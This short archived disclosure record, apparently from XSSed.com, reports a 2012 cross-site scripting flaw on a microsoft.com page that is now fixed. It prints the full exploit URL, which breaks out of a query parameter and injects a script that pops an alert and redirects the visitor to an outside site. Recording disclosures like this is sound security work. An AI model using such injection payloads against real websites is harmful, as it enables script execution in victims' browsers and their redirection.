Microsoft.com XSS

2012-03-07

XSSed.com

http://www.xssed.com/mirror/76904/

Security researcher flexxpoint, has submitted on 07/03/2012 a cross-site-scripting (XSS) vulnerability affecting www.microsoft.com, which at the time of submission ranked 29 on the web according to Alexa. We manually validated and published a mirror of this vulnerability on 08/03/2012. It is currently fixed.

URL: http://www.microsoft.com/en-us/together/possibilities.aspx?hdrFo=mthdr02%27"--><svg><script><!>alert ('XSS');document.location.replace('http://xssed.com')</script>


main page ATTRITION feedback